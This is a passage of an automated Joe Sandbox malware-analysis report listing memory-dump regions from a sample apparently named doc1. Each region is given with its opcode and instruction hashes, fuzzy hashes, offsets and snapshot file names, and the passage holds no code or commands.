                            • API String ID:
                            • Opcode ID: ef3bae4aae48a71d83d6315f9bbe7d768939a139fa048071e01eb7134c205deb
                            • Instruction ID: 71232f208556eb9468c37f3e80e48985f7d53f9d8c8e13d7c8ab645e558dd584
                            • Opcode Fuzzy Hash: ef3bae4aae48a71d83d6315f9bbe7d768939a139fa048071e01eb7134c205deb
                            • Instruction Fuzzy Hash: D7310470E14219CBDB24CFA9D944BEEBBF2FB88350F14812AD819B72A0D7745985DF90
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a4dd3081badd3f10d51ea123b614acb55c0503b557b9ba68c94bb4242ed96c3a
                            • Instruction ID: 5607769ddb804919f977e89c67f9d87fc1dd6645bb3fc373430f7ac401c40366
                            • Opcode Fuzzy Hash: a4dd3081badd3f10d51ea123b614acb55c0503b557b9ba68c94bb4242ed96c3a
                            • Instruction Fuzzy Hash: DE310274E15208DFDB14CFAAD844BEEBBB2BB88300F10806AE815B7390C7745A849F51
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e7a6648d316a51edae155084a593d2b349b8aef417c9d7551342feaf4a295f5b
                            • Instruction ID: 484f872697cd8bbc794317d1806fde9633d6fc95f35b0b3f0965ed043fb0fca5
                            • Opcode Fuzzy Hash: e7a6648d316a51edae155084a593d2b349b8aef417c9d7551342feaf4a295f5b
                            • Instruction Fuzzy Hash: 56318E34701704CFC725AF34D85896ABBB6FF8A315B50886CE8029B3A1DF71E846DB50
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7be02b064394d967d623975f215a05eab03f9c158b915b961f6f1deefc11849f
                            • Instruction ID: 72d6cea97eef68858c4eca342e580b74aed70d386b4ea227af1478de26bbfe2a
                            • Opcode Fuzzy Hash: 7be02b064394d967d623975f215a05eab03f9c158b915b961f6f1deefc11849f
                            • Instruction Fuzzy Hash: 7931E274E15218DBDB14CFAAD844BEEBBF6FB89300F10906AE815B7390C7745A849F91
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a0ee8a6e318e4827a44a2d6833110192cad2ab8ab73be4dce670dcdfb333bbb3
                            • Instruction ID: 4cf8760dd84e50db73c3228d9b9821df829700ea0089160f6af3d57c82c6d862
                            • Opcode Fuzzy Hash: a0ee8a6e318e4827a44a2d6833110192cad2ab8ab73be4dce670dcdfb333bbb3
                            • Instruction Fuzzy Hash: 5D31E675E002489FDB08DFA5D855AEEBBB6FF88310F10802AE911B73A4DB355985DF90
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c95c8036aecee12eafac7b07c9a3a96c589730c987e34007efc2803409884cd7
                            • Instruction ID: 2349ba8215e1c870995f97fdbb8a925d7f0a0aa7c5fe77e62f2868a212c6d42e
                            • Opcode Fuzzy Hash: c95c8036aecee12eafac7b07c9a3a96c589730c987e34007efc2803409884cd7
                            • Instruction Fuzzy Hash: 22318D78E0120ACBDB04DFA8D8405EEBBFEEF8D310F109669C515B7391EB3099458BA0
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6aba6d87c399c9a26237664fa732e7dde936aee3f3766cc7bcc9163ae4102eb7
                            • Instruction ID: fbc495fa68af9e7d8115cb6e514ac951cfb54b22f7adba5304c0ca218407dce6
                            • Opcode Fuzzy Hash: 6aba6d87c399c9a26237664fa732e7dde936aee3f3766cc7bcc9163ae4102eb7
                            • Instruction Fuzzy Hash: 3C219F36B106148FCB44CB79D858AAA73E2FF8E721F1540A5E10ACB362DA75DC018B80
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a41a6beefbbef27f659967739eafb6e02055f7a0fd21afbff173a69876872292
                            • Instruction ID: 790e911e79a478fb82aedcc43cd2c0adcb6dee354f8eedd29b3cdcf314a2a913
                            • Opcode Fuzzy Hash: a41a6beefbbef27f659967739eafb6e02055f7a0fd21afbff173a69876872292
                            • Instruction Fuzzy Hash: 4421A770B007498FCB05EF64D4489AEBBB6EF8E300B10456AE505DB365EB349D06DBA1
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 374c98a091b85284538b57db785192102b43407cbb854663a7441c06e0151c0f
                            • Instruction ID: dcd250a4e8bba3e4154fc834e2795f319fbf9b4e4f35985d000f0d123660b3a3
                            • Opcode Fuzzy Hash: 374c98a091b85284538b57db785192102b43407cbb854663a7441c06e0151c0f
                            • Instruction Fuzzy Hash: 1F2186303083555FDB219F3AD85CE793FAABF4A611B058069F846CB2A2DA34CD01E760
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 31abb47b02f527a6e9022178468e89758c139c9d642a43d4cd384d85950705ad
                            • Instruction ID: 18c5096e0ce226a9eb0ade38428e4396e035020cb510a00241e8a36d2ff6bb91
                            • Opcode Fuzzy Hash: 31abb47b02f527a6e9022178468e89758c139c9d642a43d4cd384d85950705ad
                            • Instruction Fuzzy Hash: 5731C0B0E06218CFEB10DFA9D444BADBBFABB4A305F1094A9D809EB254D3345D85CF08
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a1267df7844dbd40d0a208a1b5c1b18e9211c025ef4cfc2417ea51a25201bccd
                            • Instruction ID: 76b98f531d5d269a4b1ca264b6ffe353e66614324cc3a1ae9d2d5eb1bb3f6463
                            • Opcode Fuzzy Hash: a1267df7844dbd40d0a208a1b5c1b18e9211c025ef4cfc2417ea51a25201bccd
                            • Instruction Fuzzy Hash: C5217674B106098FCB04EF68D5488AEB7B6FF8D700B10456AE506A7364EF70A906DBE1
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4c121a12d740a0fd8bcfbfbab0abfbe87077733c0e62c1cd541239ae756762a8
                            • Instruction ID: 963012cab9d2bea12909adbc6fd64fdddc8bc7b5b99fdc5da352f46a6ad66daf
                            • Opcode Fuzzy Hash: 4c121a12d740a0fd8bcfbfbab0abfbe87077733c0e62c1cd541239ae756762a8
                            • Instruction Fuzzy Hash: 04217232B003158F8F249EAAE8854BEB3B6FB88261B604476E527D7244EB31DD42D760
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 71c5c22e7c80e9498e83b4d489562dfaa204677fc6e36bc04350067ef26e4ef8
                            • Instruction ID: c38d5369e7dea90bd973776683670c7abcc4811205c003c6724f49d756ad5ca4
                            • Opcode Fuzzy Hash: 71c5c22e7c80e9498e83b4d489562dfaa204677fc6e36bc04350067ef26e4ef8
                            • Instruction Fuzzy Hash: 84216A75B106148FC744DF69D898D6A7BF6FF8EB20B2500A9E506DB372DA71EC018B90
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cc6bed62147d523a2c80f23732b010b69c652c6c4d1c795c911256d6445cd3db
                            • Instruction ID: 2d173751f93f76798bf2ab0dba41c0275c54e4e9e77f2c90239a402444b71ed7
                            • Opcode Fuzzy Hash: cc6bed62147d523a2c80f23732b010b69c652c6c4d1c795c911256d6445cd3db
                            • Instruction Fuzzy Hash: 70215931E00349DFDB10DBB8C545BBEBBF5AF08340F908066D916EB2A0E634CA50EB91
                            Memory Dump Source
                            • Source File: 00000001.00000002.2292772844.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e0d000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 979e5fa57d9b4051f1a15f3c552b2404c2ed135cd710300ffdbac2dee0f0e868
                            • Instruction ID: e494c964f610d9986668dea4aea134719a60afbed7322040d7a8b432b75639c9
                            • Opcode Fuzzy Hash: 979e5fa57d9b4051f1a15f3c552b2404c2ed135cd710300ffdbac2dee0f0e868
                            • Instruction Fuzzy Hash: BF214872508204EFCB00DF94ECC0F26BF65FB88314F208569E9091B286C337D896CBA1
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6781804122066fc9cf1514c9b526b5971e8e39a07c005c12f6ef202640989de7
                            • Instruction ID: 078faa112697a26a8a95eba3b061a94347da3183692f5cab979d8bfce4e75b0e
                            • Opcode Fuzzy Hash: 6781804122066fc9cf1514c9b526b5971e8e39a07c005c12f6ef202640989de7
                            • Instruction Fuzzy Hash: A3213931A40219CFDB54DFA8C844AADB7F6BF88710F1581A9E545EB365E730DD418B90
                            Memory Dump Source
                            • Source File: 00000001.00000002.2292799238.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e1d000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: af298eb8060f3a1756aa1969be6ae0b43489a82fe189e8d4b5b51cd20fc8d843
                            • Instruction ID: 634bb045345655657be7987e7c3e53f8f28dd2900058be8af1003b3285c39223
                            • Opcode Fuzzy Hash: af298eb8060f3a1756aa1969be6ae0b43489a82fe189e8d4b5b51cd20fc8d843
                            • Instruction Fuzzy Hash: A1210A71508244DFDB15DF14DDC4B96BF66FB88314F24C56DD9055B242C336D886CBA2
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 18de806361e5744fa162ce2d8dcd374b651befd796c28270a77397dfb7ec2de6
                            • Instruction ID: c8da0b897307fe8924f0577959f8abe02f35aa079793b64fa5e4f91e09e6f0b2
                            • Opcode Fuzzy Hash: 18de806361e5744fa162ce2d8dcd374b651befd796c28270a77397dfb7ec2de6
                            • Instruction Fuzzy Hash: 78214C383042589FCB11CF2AC854EAA7BEABF8E310B054095FD45CB3A2DA35DC50DB20
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2ce671b974b0235cd4bebf7f50df2adbf730e0d78cb702dda308b33debc5192e
                            • Instruction ID: 057909212acf885f0ca921e4423952a77056437c6649bcb9d22b15f3375cf836
                            • Opcode Fuzzy Hash: 2ce671b974b0235cd4bebf7f50df2adbf730e0d78cb702dda308b33debc5192e
                            • Instruction Fuzzy Hash: 1F214C793042549FCB02CF29C854EAA3BFABF8E210B1540A6F945CB3B2DA35DC51DB20
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a68a098e9af3efddf3245542a8b83a57b82c774da91e8571660e2ce9acfc9a56
                            • Instruction ID: cda56c9b774bb0ce9df1750c565d116d96a0d385b8eb45ef27a55d061cd2ef5c
                            • Opcode Fuzzy Hash: a68a098e9af3efddf3245542a8b83a57b82c774da91e8571660e2ce9acfc9a56
                            • Instruction Fuzzy Hash: D811E2333093009FD7308B79E584A2ABBA6FFC5325B16807AE14ACB252DB35EC45D752
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c0252727ff2acd1d7c37e17aeadbc221ba123fe524dcec856b92d2ea914710a3
                            • Instruction ID: 68c1b85532c6dea45afe23c8878659298db1e0c5b0310e8b9904ece070502e8f
                            • Opcode Fuzzy Hash: c0252727ff2acd1d7c37e17aeadbc221ba123fe524dcec856b92d2ea914710a3
                            • Instruction Fuzzy Hash: FB211975A002098FDB04DFA4D959EED7BF2FB4D300F6145A8E401BB2A1DB759D41DBA0
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fd7d699cce08e3508e7cc30ffbf4b5a89263835aa16e6f92b76993d8f67119be
                            • Instruction ID: d4efde28b303fc10477e5eb2e77dc3343f54567f9316fc32305c37eeed22ab62
                            • Opcode Fuzzy Hash: fd7d699cce08e3508e7cc30ffbf4b5a89263835aa16e6f92b76993d8f67119be
                            • Instruction Fuzzy Hash: 79210635A002098FDB04DFA8D558EDDB7F2FB4C310F2041A8E505BB261DB71AD45DBA0
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e11be7843019dfeb95b1ff89f824505e2a14e8102b135ebe18d5ce522d0b5b03
                            • Instruction ID: b847fc141609982d55ec2fdaf2167b04c39215eee5b4a8e7c47d8d6199a64521
                            • Opcode Fuzzy Hash: e11be7843019dfeb95b1ff89f824505e2a14e8102b135ebe18d5ce522d0b5b03
                            • Instruction Fuzzy Hash: C72119B4E0420ADFCB14DFAAC4446AEBBF2FB88345F54C1A9D819A7245D7349982DF90
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 97fcfb676d50c43a8b2987f2a3152417e98005e91958b5a4f363acc24018392f
                            • Instruction ID: 7a1f1de60b26a67634cbff986ab24c9330c497a586bffecb6eb85e76c9a7a83e
                            • Opcode Fuzzy Hash: 97fcfb676d50c43a8b2987f2a3152417e98005e91958b5a4f363acc24018392f
                            • Instruction Fuzzy Hash: 67215E357107048FCB25DF68D84897ABBBAFF8D210F144569E50697361DB30AD05DBA1
                            Memory Dump Source
                            • Source File: 00000001.00000002.2303537237.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_55d0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: adaa04a452912afa2db30966c3849d8b010a2c2f322313d5672c8b96acd0d76f
                            • Instruction ID: 0e39fb85eb9da64c26203a8bad8ef1769f4b271a32191e766d79c1409d845c05
                            • Opcode Fuzzy Hash: adaa04a452912afa2db30966c3849d8b010a2c2f322313d5672c8b96acd0d76f
                            • Instruction Fuzzy Hash: B8210C35D04209CFDB28DFA9D4486FEFBB1FB84311F10806AD016A7291D7745985CFA1
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 48c58616255878387352996be0bed8437fec3f2ac6e7f6678ab2ce866511d432
                            • Instruction ID: 6c8b5e9d0b0329a40f74b4265d463488285b635c63e00d5b8ad44055dfefb2d5
                            • Opcode Fuzzy Hash: 48c58616255878387352996be0bed8437fec3f2ac6e7f6678ab2ce866511d432
                            • Instruction Fuzzy Hash: A821CE71A4922ACBDB24CF15D958BE9BBB6AB99304F1080E5D84AA7650D7705EC0CF08
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304800385.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5a80000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 84af25c15a9162d0e9a7f3c29b88a801cb4cb1c733685b193d3b8425547b3515
                            • Instruction ID: bef85e9be19ddb2575a1228dd2a63cd316c8ea9d493f3a9f0cbd2df66d87a971
                            • Opcode Fuzzy Hash: 84af25c15a9162d0e9a7f3c29b88a801cb4cb1c733685b193d3b8425547b3515
                            • Instruction Fuzzy Hash: 1321F3B0D15219EFDF08DFA9C445AAEFBF5AB49300F14C0A9D819A3350DB759A41CF51
                            Memory Dump Source
                            • Source File: 00000001.00000002.2292799238.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e1d000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3c7e560d976200e390b31e4112566262e0d9c1fdc95844787c53f24f7f92f29b
                            • Instruction ID: 86b66c808bac289b9140bdb46cf115ed806791caf27fe5f2788c93df7a3a7c03
                            • Opcode Fuzzy Hash: 3c7e560d976200e390b31e4112566262e0d9c1fdc95844787c53f24f7f92f29b
                            • Instruction Fuzzy Hash: AA21B07550D3C08FCB02CF20D994756BF72EB86314F2981EAD8448B653C33A984ACB62
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4932c96a847efd6b20220a3d5f66cc71d9d7e78d8d9587747831c64be727bafe
                            • Instruction ID: 5d7074d26d2e05f881a1c600d0e1d04901670b2e30412b5416036353c5058df7
                            • Opcode Fuzzy Hash: 4932c96a847efd6b20220a3d5f66cc71d9d7e78d8d9587747831c64be727bafe
                            • Instruction Fuzzy Hash: D621C3306103058FDB18EB78E8547AEBBFAEB85310F00C538D00AD7685EFB199458BE0
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: aa3277ce5e81a2971232371011c540d4c1ef0aa39ee154645816a46cd81b18bb
                            • Instruction ID: 3098a1d538fbaddabded2d858f9be7257adba00694e4bded3524bfd99b68385f
                            • Opcode Fuzzy Hash: aa3277ce5e81a2971232371011c540d4c1ef0aa39ee154645816a46cd81b18bb
                            • Instruction Fuzzy Hash: AA110072A00618EF8F15DF99D854CDEBBFEFF4C310B058166E505E7211D630A905DBA0
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bbef01d7e0cadede58661d296b9f57db60874659b9b39f64a2c67a942b0de8ce
                            • Instruction ID: 3345bc854e63adac074212a47f0a5a70f7e3350ccdaf946f87f5827f212932dc
                            • Opcode Fuzzy Hash: bbef01d7e0cadede58661d296b9f57db60874659b9b39f64a2c67a942b0de8ce
                            • Instruction Fuzzy Hash: D221E0B4E04209DBDB04CFAAD8646EEBBFABB89300F108469D815F3290E7745A45CB65
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 77ec2e97cdd4b61595b3ab0decb2c6c3f141985322e05998090d4c52a89c9695
                            • Instruction ID: 74c87a80ed4e1255ddc106bcc20ddc7d7816e8b24638174578e71aea9fad3709
                            • Opcode Fuzzy Hash: 77ec2e97cdd4b61595b3ab0decb2c6c3f141985322e05998090d4c52a89c9695
                            • Instruction Fuzzy Hash: 1A1137B1E00219CFDF18EFA9C4446EEBBFAFB88312F108026D516B3210D7755985CBA0
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ecb1ccb8ea6c5deed3f26c11b8dc6d076cf2dbaaf1f11105a3f6f908b23235f3
                            • Instruction ID: 270a72bdfe085f002700a19045aa732642b3df68e87f526dee75179646293892
                            • Opcode Fuzzy Hash: ecb1ccb8ea6c5deed3f26c11b8dc6d076cf2dbaaf1f11105a3f6f908b23235f3
                            • Instruction Fuzzy Hash: 4C118236710104AFCB1A9F59D844D69BB76FF8C32470580A5FA059B232CB31D822EB80
                            Memory Dump Source
                            • Source File: 00000001.00000002.2292772844.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e0d000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                            • Instruction ID: c7bd161cb67c03a76bc4aa9859808534a156761a6461efb98277e2588b725a09
                            • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                            • Instruction Fuzzy Hash: B111D376508284DFCB15CF50E9C4B16BF71FB94324F24C5A9D8490B656C33AD89ACBA2
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7b3b220bb576ea8a2d532eeb98e5bdfeb4fb8f9e26e5c81db8038b1d00b59c68
                            • Instruction ID: 665dc1e442b8386a08d604da992b57ed32aaa2bc2f38ce3bc0faa4ca5b8fad7c
                            • Opcode Fuzzy Hash: 7b3b220bb576ea8a2d532eeb98e5bdfeb4fb8f9e26e5c81db8038b1d00b59c68
                            • Instruction Fuzzy Hash: D301ED747003409FC739AB30C418A3A3BA3AB8A314F148A5DE05A8B691CB71EC42EB81
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304800385.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5a80000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1206cf460e517c8a875f2e8e04a1854849de2e36d892746712254c35fe77bdf6
                            • Instruction ID: 5a6bdf97c9f5d46cb768c9c7f72207d4bc8ee5c037bff4fe1aae75067da0c4d1
                            • Opcode Fuzzy Hash: 1206cf460e517c8a875f2e8e04a1854849de2e36d892746712254c35fe77bdf6
                            • Instruction Fuzzy Hash: 1A017136340254AFEB149E59EC84FAE77A9EF88721F108026FA14CB291C6B1D90087A0
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 45614c7df595023541c7f6c73f4859575e7c29f7837a36b1ecde35757599ca30
                            • Instruction ID: b474e336264a9c4560649b30cbe8e4b15b4d3aef6b46bb3f40ebbe4b13993eb7
                            • Opcode Fuzzy Hash: 45614c7df595023541c7f6c73f4859575e7c29f7837a36b1ecde35757599ca30
                            • Instruction Fuzzy Hash: 5101D47AD14104DFCB20DFB9D58169EBBBDEB45200F2480B99C18D3700E2319E01FBA1
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 842fd9bc47a526c0e49acbd5e3f0bdb66a539592fff0b353e69a7e6c2e0cd245
                            • Instruction ID: 269b4a4278fb8cee540d7a140d3002a3a63a3a3b041148f15f2a6081c3f0a6e9
                            • Opcode Fuzzy Hash: 842fd9bc47a526c0e49acbd5e3f0bdb66a539592fff0b353e69a7e6c2e0cd245
                            • Instruction Fuzzy Hash: 19012CA540E7C04FC7038B748C967923FB4AB03221B1E84EBC488CE167C51D440BD727
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304800385.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5a80000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9fcf6a141d8ddaad04cfc6563103a0c61a9bbdb1c3c305c03f2c7ed2231459dd
